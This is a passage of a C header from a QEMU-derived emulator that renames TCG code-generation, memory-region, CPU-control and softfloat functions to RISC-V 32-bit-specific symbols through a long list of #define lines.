#define tcg_gen_ld_i64 tcg_gen_ld_i64_riscv32 #define tcg_gen_mov_i64 tcg_gen_mov_i64_riscv32 #define tcg_gen_movi_i64 tcg_gen_movi_i64_riscv32 #define tcg_gen_mul_i64 tcg_gen_mul_i64_riscv32 #define tcg_gen_or_i64 tcg_gen_or_i64_riscv32 #define tcg_gen_sar_i64 tcg_gen_sar_i64_riscv32 #define tcg_gen_shl_i64 tcg_gen_shl_i64_riscv32 #define tcg_gen_shr_i64 tcg_gen_shr_i64_riscv32 #define tcg_gen_st_i64 tcg_gen_st_i64_riscv32 #define tcg_gen_xor_i64
tcg_gen_xor_i64_riscv32 #define cpu_icount_to_ns cpu_icount_to_ns_riscv32 #define cpu_is_stopped cpu_is_stopped_riscv32 #define cpu_get_ticks cpu_get_ticks_riscv32 #define cpu_get_clock cpu_get_clock_riscv32 #define cpu_resume cpu_resume_riscv32 #define qemu_init_vcpu qemu_init_vcpu_riscv32 #define cpu_stop_current cpu_stop_current_riscv32 #define resume_all_vcpus resume_all_vcpus_riscv32 #define vm_start vm_start_riscv32 #define address_space_dispatch_compact address_space_dispatch_compact_riscv32 #define flatview_translate flatview_translate_riscv32 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_riscv32 #define qemu_get_cpu qemu_get_cpu_riscv32 #define cpu_address_space_init cpu_address_space_init_riscv32 #define cpu_get_address_space cpu_get_address_space_riscv32 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_riscv32 #define cpu_exec_initfn cpu_exec_initfn_riscv32 #define cpu_exec_realizefn cpu_exec_realizefn_riscv32 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_riscv32 #define cpu_watchpoint_insert cpu_watchpoint_insert_riscv32 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_riscv32 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_riscv32 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_riscv32 #define cpu_breakpoint_insert cpu_breakpoint_insert_riscv32 #define cpu_breakpoint_remove cpu_breakpoint_remove_riscv32 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_riscv32 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_riscv32 #define cpu_abort cpu_abort_riscv32 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_riscv32 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_riscv32 #define flatview_add_to_dispatch flatview_add_to_dispatch_riscv32 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_riscv32 #define qemu_ram_get_offset qemu_ram_get_offset_riscv32 #define qemu_ram_get_used_length qemu_ram_get_used_length_riscv32 #define qemu_ram_is_shared qemu_ram_is_shared_riscv32 #define qemu_ram_pagesize qemu_ram_pagesize_riscv32 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_riscv32 #define qemu_ram_alloc qemu_ram_alloc_riscv32 #define qemu_ram_free qemu_ram_free_riscv32 #define qemu_map_ram_ptr qemu_map_ram_ptr_riscv32 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_riscv32 #define qemu_ram_block_from_host qemu_ram_block_from_host_riscv32 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_riscv32 #define cpu_check_watchpoint cpu_check_watchpoint_riscv32 #define iotlb_to_section iotlb_to_section_riscv32 #define address_space_dispatch_new address_space_dispatch_new_riscv32 #define address_space_dispatch_free address_space_dispatch_free_riscv32 #define flatview_read_continue flatview_read_continue_riscv32 #define address_space_read_full address_space_read_full_riscv32 #define address_space_write address_space_write_riscv32 #define address_space_rw address_space_rw_riscv32 #define cpu_physical_memory_rw cpu_physical_memory_rw_riscv32 #define address_space_write_rom address_space_write_rom_riscv32 #define cpu_flush_icache_range cpu_flush_icache_range_riscv32 #define cpu_exec_init_all cpu_exec_init_all_riscv32 #define address_space_access_valid address_space_access_valid_riscv32 #define address_space_map address_space_map_riscv32 #define address_space_unmap address_space_unmap_riscv32 #define cpu_physical_memory_map cpu_physical_memory_map_riscv32 #define cpu_physical_memory_unmap 
cpu_physical_memory_unmap_riscv32 #define cpu_memory_rw_debug cpu_memory_rw_debug_riscv32 #define qemu_target_page_size qemu_target_page_size_riscv32 #define qemu_target_page_bits qemu_target_page_bits_riscv32 #define qemu_target_page_bits_min qemu_target_page_bits_min_riscv32 #define target_words_bigendian target_words_bigendian_riscv32 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_riscv32 #define ram_block_discard_range ram_block_discard_range_riscv32 #define ramblock_is_pmem ramblock_is_pmem_riscv32 #define page_size_init page_size_init_riscv32 #define set_preferred_target_page_bits set_preferred_target_page_bits_riscv32 #define finalize_target_page_bits finalize_target_page_bits_riscv32 #define cpu_outb cpu_outb_riscv32 #define cpu_outw cpu_outw_riscv32 #define cpu_outl cpu_outl_riscv32 #define cpu_inb cpu_inb_riscv32 #define cpu_inw cpu_inw_riscv32 #define cpu_inl cpu_inl_riscv32 #define memory_map memory_map_riscv32 #define memory_map_io memory_map_io_riscv32 #define memory_map_ptr memory_map_ptr_riscv32 #define memory_cow memory_cow_riscv32 #define memory_unmap memory_unmap_riscv32 #define memory_moveout memory_moveout_riscv32 #define memory_movein memory_movein_riscv32 #define memory_free memory_free_riscv32 #define flatview_unref flatview_unref_riscv32 #define address_space_get_flatview address_space_get_flatview_riscv32 #define memory_region_transaction_begin memory_region_transaction_begin_riscv32 #define memory_region_transaction_commit memory_region_transaction_commit_riscv32 #define memory_region_init memory_region_init_riscv32 #define memory_region_access_valid memory_region_access_valid_riscv32 #define memory_region_dispatch_read memory_region_dispatch_read_riscv32 #define memory_region_dispatch_write memory_region_dispatch_write_riscv32 #define memory_region_init_io memory_region_init_io_riscv32 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_riscv32 #define memory_region_size memory_region_size_riscv32 #define memory_region_set_readonly memory_region_set_readonly_riscv32 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_riscv32 #define memory_region_from_host memory_region_from_host_riscv32 #define memory_region_get_ram_addr memory_region_get_ram_addr_riscv32 #define memory_region_add_subregion memory_region_add_subregion_riscv32 #define memory_region_del_subregion memory_region_del_subregion_riscv32 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_riscv32 #define memory_region_find memory_region_find_riscv32 #define memory_region_filter_subregions memory_region_filter_subregions_riscv32 #define memory_listener_register memory_listener_register_riscv32 #define memory_listener_unregister memory_listener_unregister_riscv32 #define address_space_remove_listeners address_space_remove_listeners_riscv32 #define address_space_init address_space_init_riscv32 #define address_space_destroy address_space_destroy_riscv32 #define memory_region_init_ram memory_region_init_ram_riscv32 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_riscv32 #define find_memory_mapping find_memory_mapping_riscv32 #define exec_inline_op exec_inline_op_riscv32 #define floatx80_default_nan floatx80_default_nan_riscv32 #define float_raise float_raise_riscv32 #define float16_is_quiet_nan float16_is_quiet_nan_riscv32 #define float16_is_signaling_nan float16_is_signaling_nan_riscv32 #define float32_is_quiet_nan float32_is_quiet_nan_riscv32 #define float32_is_signaling_nan float32_is_signaling_nan_riscv32 
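/*
 * The float16_/float32_/float64_/floatx80_/float128_ symbols below belong
 * to QEMU's softfloat library, which implements IEEE 754 arithmetic in
 * pure integer code so that guest floating-point results do not depend on
 * the host FPU; they receive the same per-target _riscv32 suffix as the
 * helpers above.
 */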
#define float64_is_quiet_nan float64_is_quiet_nan_riscv32
#define float64_is_signaling_nan float64_is_signaling_nan_riscv32
#define floatx80_is_quiet_nan floatx80_is_quiet_nan_riscv32
#define floatx80_is_signaling_nan floatx80_is_signaling_nan_riscv32
#define floatx80_silence_nan floatx80_silence_nan_riscv32
#define propagateFloatx80NaN propagateFloatx80NaN_riscv32
#define float128_is_quiet_nan float128_is_quiet_nan_riscv32
#define float128_is_signaling_nan float128_is_signaling_nan_riscv32
#define float128_silence_nan float128_silence_nan_riscv32
#define float16_add float16_add_riscv32
#define float16_sub float16_sub_riscv32
#define float32_add float32_add_riscv32
#define float32_sub float32_sub_riscv32
#define float64_add float64_add_riscv32
#define float64_sub float64_sub_riscv32
#define float16_mul float16_mul_riscv32
#define float32_mul float32_mul_riscv32
#define float64_mul float64_mul_riscv32
#define float16_muladd float16_muladd_riscv32
#define float32_muladd float32_muladd_riscv32
#define float64_muladd float64_muladd_riscv32
#define float16_div float16_div_riscv32
#define float32_div float32_div_riscv32
#define float64_div float64_div_riscv32
#define float16_to_float32 float16_to_float32_riscv32
#define float16_to_float64 float16_to_float64_riscv32
#define float32_to_float16 float32_to_float16_riscv32
#define float32_to_float64 float32_to_float64_riscv32
#define float64_to_float16 float64_to_float16_riscv32
#define float64_to_float32 float64_to_float32_riscv32
#define float16_round_to_int float16_round_to_int_riscv32
#define float32_round_to_int float32_round_to_int_riscv32
#define float64_round_to_int float64_round_to_int_riscv32
#define float16_to_int16_scalbn float16_to_int16_scalbn_riscv32
#define float16_to_int32_scalbn float16_to_int32_scalbn_riscv32
#define float16_to_int64_scalbn float16_to_int64_scalbn_riscv32
#define float32_to_int16_scalbn float32_to_int16_scalbn_riscv32
#define float32_to_int32_scalbn float32_to_int32_scalbn_riscv32
#define float32_to_int64_scalbn float32_to_int64_scalbn_riscv32
#define float64_to_int16_scalbn float64_to_int16_scalbn_riscv32
#define float64_to_int32_scalbn float64_to_int32_scalbn_riscv32
#define float64_to_int64_scalbn float64_to_int64_scalbn_riscv32
#define float16_to_int16 float16_to_int16_riscv32
#define float16_to_int32 float16_to_int32_riscv32
#define float16_to_int64 float16_to_int64_riscv32
#define float32_to_int16 float32_to_int16_riscv32
#define float32_to_int32 float32_to_int32_riscv32
#define float32_to_int64 float32_to_int64_riscv32
#define float64_to_int16 float64_to_int16_riscv32
#define float64_to_int32 float64_to_int32_riscv32
#define float64_to_int64 float64_to_int64_riscv32
#define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_riscv32
#define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_riscv32
#define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_riscv32
#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_riscv32
#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_riscv32
#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_riscv32
#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_riscv32
#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_riscv32
#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_riscv32
#define float16_to_uint16_scalbn float16_to_uint16_scalbn_riscv32
#define float16_to_uint32_scalbn float16_to_uint32_scalbn_riscv32
#define float16_to_uint64_scalbn float16_to_uint64_scalbn_riscv32
#define float32_to_uint16_scalbn float32_to_uint16_scalbn_riscv32
#define float32_to_uint32_scalbn float32_to_uint32_scalbn_riscv32
#define float32_to_uint64_scalbn float32_to_uint64_scalbn_riscv32
#define float64_to_uint16_scalbn float64_to_uint16_scalbn_riscv32
#define float64_to_uint32_scalbn float64_to_uint32_scalbn_riscv32
#define float64_to_uint64_scalbn float64_to_uint64_scalbn_riscv32
#define float16_to_uint16 float16_to_uint16_riscv32
#define float16_to_uint32 float16_to_uint32_riscv32
#define float16_to_uint64 float16_to_uint64_riscv32
#define float32_to_uint16 float32_to_uint16_riscv32
#define float32_to_uint32 float32_to_uint32_riscv32
#define float32_to_uint64 float32_to_uint64_riscv32
#define float64_to_uint16 float64_to_uint16_riscv32
#define float64_to_uint32 float64_to_uint32_riscv32
#define float64_to_uint64 float64_to_uint64_riscv32
#define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_riscv32
#define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_riscv32
#define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_riscv32
#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_riscv32
#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_riscv32
#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_riscv32
#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_riscv32
#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_riscv32
#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_riscv32
#define int64_to_float16_scalbn int64_to_float16_scalbn_riscv32
#define int32_to_float16_scalbn int32_to_float16_scalbn_riscv32
#define int16_to_float16_scalbn int16_to_float16_scalbn_riscv32
#define int64_to_float16 int64_to_float16_riscv32
#define int32_to_float16 int32_to_float16_riscv32
#define int16_to_float16 int16_to_float16_riscv32
#define int64_to_float32_scalbn int64_to_float32_scalbn_riscv32
#define int32_to_float32_scalbn int32_to_float32_scalbn_riscv32
#define int16_to_float32_scalbn int16_to_float32_scalbn_riscv32
#define int64_to_float32 int64_to_float32_riscv32
#define int32_to_float32 int32_to_float32_riscv32
#define int16_to_float32 int16_to_float32_riscv32
#define int64_to_float64_scalbn int64_to_float64_scalbn_riscv32
#define int32_to_float64_scalbn int32_to_float64_scalbn_riscv32
#define int16_to_float64_scalbn int16_to_float64_scalbn_riscv32
#define int64_to_float64 int64_to_float64_riscv32
#define int32_to_float64 int32_to_float64_riscv32
#define int16_to_float64 int16_to_float64_riscv32
#define uint64_to_float16_scalbn uint64_to_float16_scalbn_riscv32
#define uint32_to_float16_scalbn uint32_to_float16_scalbn_riscv32
#define uint16_to_float16_scalbn uint16_to_float16_scalbn_riscv32
#define uint64_to_float16 uint64_to_float16_riscv32
#define uint32_to_float16 uint32_to_float16_riscv32
#define uint16_to_float16 uint16_to_float16_riscv32
#define uint64_to_float32_scalbn uint64_to_float32_scalbn_riscv32
#define uint32_to_float32_scalbn uint32_to_float32_scalbn_riscv32
#define uint16_to_float32_scalbn uint16_to_float32_scalbn_riscv32
#define uint64_to_float32 uint64_to_float32_riscv32
#define uint32_to_float32 uint32_to_float32_riscv32
#define uint16_to_float32 uint16_to_float32_riscv32
#define uint64_to_float64_scalbn uint64_to_float64_scalbn_riscv32
#define uint32_to_float64_scalbn uint32_to_float64_scalbn_riscv32
#define uint16_to_float64_scalbn uint16_to_float64_scalbn_riscv32
#define uint64_to_float64 uint64_to_float64_riscv32
#define uint32_to_float64 uint32_to_float64_riscv32
#define uint16_to_float64 uint16_to_float64_riscv32
#define float16_min float16_min_riscv32
#define float16_minnum float16_minnum_riscv32
#define float16_minnummag float16_minnummag_riscv32
#define float16_max float16_max_riscv32
#define float16_maxnum float16_maxnum_riscv32
#define float16_maxnummag float16_maxnummag_riscv32
#define float32_min float32_min_riscv32
#define float32_minnum float32_minnum_riscv32
#define float32_minnummag float32_minnummag_riscv32
#define float32_max float32_max_riscv32
#define float32_maxnum float32_maxnum_riscv32
#define float32_maxnummag float32_maxnummag_riscv32
#define float64_min float64_min_riscv32
#define float64_minnum float64_minnum_riscv32
#define float64_minnummag float64_minnummag_riscv32
#define float64_max float64_max_riscv32
#define float64_maxnum float64_maxnum_riscv32
#define float64_maxnummag float64_maxnummag_riscv32
#define float16_compare float16_compare_riscv32
#define float16_compare_quiet float16_compare_quiet_riscv32
#define float32_compare float32_compare_riscv32
#define float32_compare_quiet float32_compare_quiet_riscv32
#define float64_compare float64_compare_riscv32
#define float64_compare_quiet float64_compare_quiet_riscv32
#define float16_scalbn float16_scalbn_riscv32
#define float32_scalbn float32_scalbn_riscv32
#define float64_scalbn float64_scalbn_riscv32
#define float16_sqrt float16_sqrt_riscv32
#define float32_sqrt float32_sqrt_riscv32
#define float64_sqrt float64_sqrt_riscv32
#define float16_default_nan float16_default_nan_riscv32
#define float32_default_nan float32_default_nan_riscv32
#define float64_default_nan float64_default_nan_riscv32
#define float128_default_nan float128_default_nan_riscv32
#define float16_silence_nan float16_silence_nan_riscv32
#define float32_silence_nan float32_silence_nan_riscv32
#define float64_silence_nan float64_silence_nan_riscv32
#define float16_squash_input_denormal float16_squash_input_denormal_riscv32
#define float32_squash_input_denormal float32_squash_input_denormal_riscv32
#define float64_squash_input_denormal float64_squash_input_denormal_riscv32
#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_riscv32
#define roundAndPackFloatx80 roundAndPackFloatx80_riscv32
#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_riscv32
#define int32_to_floatx80 int32_to_floatx80_riscv32
#define int32_to_float128 int32_to_float128_riscv32
#define int64_to_floatx80 int64_to_floatx80_riscv32
#define int64_to_float128 int64_to_float128_riscv32
#define uint64_to_float128 uint64_to_float128_riscv32
#define float32_to_floatx80 float32_to_floatx80_riscv32
#define float32_to_float128 float32_to_float128_riscv32
#define float32_rem float32_rem_riscv32
#define float32_exp2 float32_exp2_riscv32
#define float32_log2 float32_log2_riscv32
#define float32_eq float32_eq_riscv32
#define float32_le float32_le_riscv32
#define float32_lt float32_lt_riscv32
#define float32_unordered float32_unordered_riscv32
#define float32_eq_quiet float32_eq_quiet_riscv32
#define float32_le_quiet float32_le_quiet_riscv32
#define float32_lt_quiet float32_lt_quiet_riscv32
#define float32_unordered_quiet float32_unordered_quiet_riscv32
#define float64_to_floatx80 float64_to_floatx80_riscv32
#define float64_to_float128 float64_to_float128_riscv32
#define float64_rem float64_rem_riscv32
#define float64_log2 float64_log2_riscv32
#define float64_eq float64_eq_riscv32
#define float64_le float64_le_riscv32
#define float64_lt float64_lt_riscv32
#define float64_unordered float64_unordered_riscv32
#define float64_eq_quiet float64_eq_quiet_riscv32
#define float64_le_quiet float64_le_quiet_riscv32
#define float64_lt_quiet float64_lt_quiet_riscv32
#define float64_unordered_quiet float64_unordered_quiet_riscv32
#define floatx80_to_int32 floatx80_to_int32_riscv32
#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_riscv32
#define floatx80_to_int64 floatx80_to_int64_riscv32
#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_riscv32
#define floatx80_to_float32 floatx80_to_float32_riscv32
#define floatx80_to_float64 floatx80_to_float64_riscv32
#define floatx80_to_float128 floatx80_to_float128_riscv32
#define floatx80_round floatx80_round_riscv32
#define floatx80_round_to_int floatx80_round_to_int_riscv32
#define floatx80_add floatx80_add_riscv32
#define floatx80_sub floatx80_sub_riscv32
#define floatx80_mul floatx80_mul_riscv32
#define floatx80_div floatx80_div_riscv32
#define floatx80_rem floatx80_rem_riscv32
#define floatx80_sqrt floatx80_sqrt_riscv32
#define floatx80_eq floatx80_eq_riscv32
#define floatx80_le floatx80_le_riscv32
#define floatx80_lt floatx80_lt_riscv32
#define floatx80_unordered floatx80_unordered_riscv32
#define floatx80_eq_quiet floatx80_eq_quiet_riscv32
#define floatx80_le_quiet floatx80_le_quiet_riscv32
#define floatx80_lt_quiet floatx80_lt_quiet_riscv32
#define floatx80_unordered_quiet floatx80_unordered_quiet_riscv32
#define float128_to_int32 float128_to_int32_riscv32
#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_riscv32
#define float128_to_int64 float128_to_int64_riscv32
#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_riscv32
#define float128_to_uint64 float128_to_uint64_riscv32
#define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_riscv32
#define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_riscv32
#define float128_to_uint32 float128_to_uint32_riscv32
#define float128_to_float32 float128_to_float32_riscv32
#define float128_to_float64 float128_to_float64_riscv32
#define float128_to_floatx80 float128_to_floatx80_riscv32
#define float128_round_to_int float128_round_to_int_riscv32
#define float128_add float128_add_riscv32
#define float128_sub float128_sub_riscv32
#define float128_mul float128_mul_riscv32
#define float128_div float128_div_riscv32
#define float128_rem float128_rem_riscv32
#define float128_sqrt float128_sqrt_riscv32
#define float128_eq float128_eq_riscv32
#define float128_le float128_le_riscv32
#define float128_lt float128_lt_riscv32
#define float128_unordered float128_unordered_riscv32
#define float128_eq_quiet float128_eq_quiet_riscv32
#define float128_le_quiet float128_le_quiet_riscv32
#define float128_lt_quiet float128_lt_quiet_riscv32
#define float128_unordered_quiet float128_unordered_quiet_riscv32
#define floatx80_compare floatx80_compare_riscv32
#define floatx80_compare_quiet floatx80_compare_quiet_riscv32
#define float128_compare float128_compare_riscv32
#define float128_compare_quiet float128_compare_quiet_riscv32
#define floatx80_scalbn floatx80_scalbn_riscv32
#define float128_scalbn float128_scalbn_riscv32
#define softfloat_init softfloat_init_riscv32
#define tcg_optimize tcg_optimize_riscv32
#define gen_new_label gen_new_label_riscv32
#define tcg_can_emit_vec_op tcg_can_emit_vec_op_riscv32
#define tcg_expand_vec_op tcg_expand_vec_op_riscv32
#define tcg_register_jit tcg_register_jit_riscv32
#define tcg_tb_insert tcg_tb_insert_riscv32
#define tcg_tb_remove tcg_tb_remove_riscv32
#define tcg_tb_lookup tcg_tb_lookup_riscv32
#define tcg_tb_foreach tcg_tb_foreach_riscv32
#define tcg_nb_tbs tcg_nb_tbs_riscv32
#define tcg_region_reset_all tcg_region_reset_all_riscv32
#define tcg_region_init tcg_region_init_riscv32
#define tcg_code_size tcg_code_size_riscv32
#define tcg_code_capacity tcg_code_capacity_riscv32
#define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_riscv32
#define tcg_malloc_internal tcg_malloc_internal_riscv32
#define tcg_pool_reset tcg_pool_reset_riscv32
#define tcg_context_init tcg_context_init_riscv32
#define tcg_tb_alloc tcg_tb_alloc_riscv32
#define tcg_prologue_init tcg_prologue_init_riscv32
#define tcg_func_start tcg_func_start_riscv32
#define tcg_set_frame tcg_set_frame_riscv32
#define tcg_global_mem_new_internal tcg_global_mem_new_internal_riscv32
#define tcg_temp_new_internal tcg_temp_new_internal_riscv32
#define tcg_temp_new_vec tcg_temp_new_vec_riscv32
#define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_riscv32
#define tcg_temp_free_internal tcg_temp_free_internal_riscv32
#define tcg_const_i32 tcg_const_i32_riscv32
#define tcg_const_i64 tcg_const_i64_riscv32
#define tcg_const_local_i32 tcg_const_local_i32_riscv32
#define tcg_const_local_i64 tcg_const_local_i64_riscv32
#define tcg_op_supported tcg_op_supported_riscv32
#define tcg_gen_callN tcg_gen_callN_riscv32
#define tcg_op_remove tcg_op_remove_riscv32
#define tcg_emit_op tcg_emit_op_riscv32
#define tcg_op_insert_before tcg_op_insert_before_riscv32
#define tcg_op_insert_after tcg_op_insert_after_riscv32
#define tcg_cpu_exec_time tcg_cpu_exec_time_riscv32
#define tcg_gen_code tcg_gen_code_riscv32
#define tcg_gen_op1 tcg_gen_op1_riscv32
#define tcg_gen_op2 tcg_gen_op2_riscv32
#define tcg_gen_op3 tcg_gen_op3_riscv32
#define tcg_gen_op4 tcg_gen_op4_riscv32
#define tcg_gen_op5 tcg_gen_op5_riscv32
#define tcg_gen_op6 tcg_gen_op6_riscv32
#define tcg_gen_mb tcg_gen_mb_riscv32
#define tcg_gen_addi_i32 tcg_gen_addi_i32_riscv32
#define tcg_gen_subfi_i32 tcg_gen_subfi_i32_riscv32
#define tcg_gen_subi_i32 tcg_gen_subi_i32_riscv32
#define tcg_gen_andi_i32 tcg_gen_andi_i32_riscv32
#define tcg_gen_ori_i32 tcg_gen_ori_i32_riscv32
#define tcg_gen_xori_i32 tcg_gen_xori_i32_riscv32
#define tcg_gen_shli_i32 tcg_gen_shli_i32_riscv32
#define tcg_gen_shri_i32 tcg_gen_shri_i32_riscv32
#define tcg_gen_sari_i32 tcg_gen_sari_i32_riscv32
#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_riscv32
#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_riscv32
#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_riscv32
#define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_riscv32
#define tcg_gen_muli_i32 tcg_gen_muli_i32_riscv32
#define tcg_gen_div_i32 tcg_gen_div_i32_riscv32
#define tcg_gen_rem_i32 tcg_gen_rem_i32_riscv32
#define tcg_gen_divu_i32 tcg_gen_divu_i32_riscv32
#define tcg_gen_remu_i32 tcg_gen_remu_i32_riscv32
#define tcg_gen_andc_i32 tcg_gen_andc_i32_riscv32
#define tcg_gen_eqv_i32 tcg_gen_eqv_i32_riscv32
#define tcg_gen_nand_i32 tcg_gen_nand_i32_riscv32
#define tcg_gen_nor_i32 tcg_gen_nor_i32_riscv32
#define tcg_gen_orc_i32 tcg_gen_orc_i32_riscv32
#define tcg_gen_clz_i32 tcg_gen_clz_i32_riscv32
#define tcg_gen_clzi_i32 tcg_gen_clzi_i32_riscv32
#define tcg_gen_ctz_i32 tcg_gen_ctz_i32_riscv32
#define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_riscv32
#define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_riscv32
#define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_riscv32
#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_riscv32
#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_riscv32
#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_riscv32
#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_riscv32
#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_riscv32
#define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_riscv32
#define tcg_gen_extract_i32 tcg_gen_extract_i32_riscv32
#define tcg_gen_sextract_i32 tcg_gen_sextract_i32_riscv32
#define tcg_gen_extract2_i32 tcg_gen_extract2_i32_riscv32
#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_riscv32
#define tcg_gen_add2_i32 tcg_gen_add2_i32_riscv32
#define tcg_gen_sub2_i32 tcg_gen_sub2_i32_riscv32
#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_riscv32
#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_riscv32
#define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_riscv32
#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_riscv32
#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_riscv32
#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_riscv32
#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_riscv32
#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_riscv32
#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_riscv32
#define tcg_gen_smin_i32 tcg_gen_smin_i32_riscv32
#define tcg_gen_umin_i32 tcg_gen_umin_i32_riscv32
#define tcg_gen_smax_i32 tcg_gen_smax_i32_riscv32
#define tcg_gen_umax_i32 tcg_gen_umax_i32_riscv32
#define tcg_gen_abs_i32 tcg_gen_abs_i32_riscv32
#define tcg_gen_addi_i64 tcg_gen_addi_i64_riscv32
#define tcg_gen_subfi_i64 tcg_gen_subfi_i64_riscv32
#define tcg_gen_subi_i64 tcg_gen_subi_i64_riscv32
#define tcg_gen_andi_i64 tcg_gen_andi_i64_riscv32
#define tcg_gen_ori_i64 tcg_gen_ori_i64_riscv32
#define tcg_gen_xori_i64 tcg_gen_xori_i64_riscv32
#define tcg_gen_shli_i64 tcg_gen_shli_i64_riscv32
#define tcg_gen_shri_i64 tcg_gen_shri_i64_riscv32
#define tcg_gen_sari_i64 tcg_gen_sari_i64_riscv32
#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_riscv32
#define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_riscv32
#define tcg_gen_setcond_i64 tcg_gen_setcond_i64_riscv32
#define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_riscv32
#define tcg_gen_muli_i64 tcg_gen_muli_i64_riscv32
#define tcg_gen_div_i64 tcg_gen_div_i64_riscv32
#define tcg_gen_rem_i64 tcg_gen_rem_i64_riscv32
#define tcg_gen_divu_i64 tcg_gen_divu_i64_riscv32
#define tcg_gen_remu_i64 tcg_gen_remu_i64_riscv32
#define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_riscv32
#define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_riscv32
#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_riscv32
#define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_riscv32
#define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_riscv32
#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_riscv32
#define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_riscv32
#define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_riscv32
#define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_riscv32
#define tcg_gen_not_i64 tcg_gen_not_i64_riscv32
#define tcg_gen_andc_i64 tcg_gen_andc_i64_riscv32
#define tcg_gen_eqv_i64 tcg_gen_eqv_i64_riscv32
#define tcg_gen_nand_i64 tcg_gen_nand_i64_riscv32
#define tcg_gen_nor_i64 tcg_gen_nor_i64_riscv32
#define tcg_gen_orc_i64 tcg_gen_orc_i64_riscv32
#define tcg_gen_clz_i64 tcg_gen_clz_i64_riscv32
#define tcg_gen_clzi_i64 tcg_gen_clzi_i64_riscv32
#define tcg_gen_ctz_i64 tcg_gen_ctz_i64_riscv32
#define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_riscv32
#define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_riscv32
#define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_riscv32
#define tcg_gen_rotl_i64 tcg_gen_rotl_i64_riscv32
#define tcg_gen_rotli_i64 tcg_gen_rotli_i64_riscv32
#define tcg_gen_rotr_i64 tcg_gen_rotr_i64_riscv32
#define tcg_gen_rotri_i64 tcg_gen_rotri_i64_riscv32
#define tcg_gen_deposit_i64 tcg_gen_deposit_i64_riscv32
#define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_riscv32
#define tcg_gen_extract_i64 tcg_gen_extract_i64_riscv32
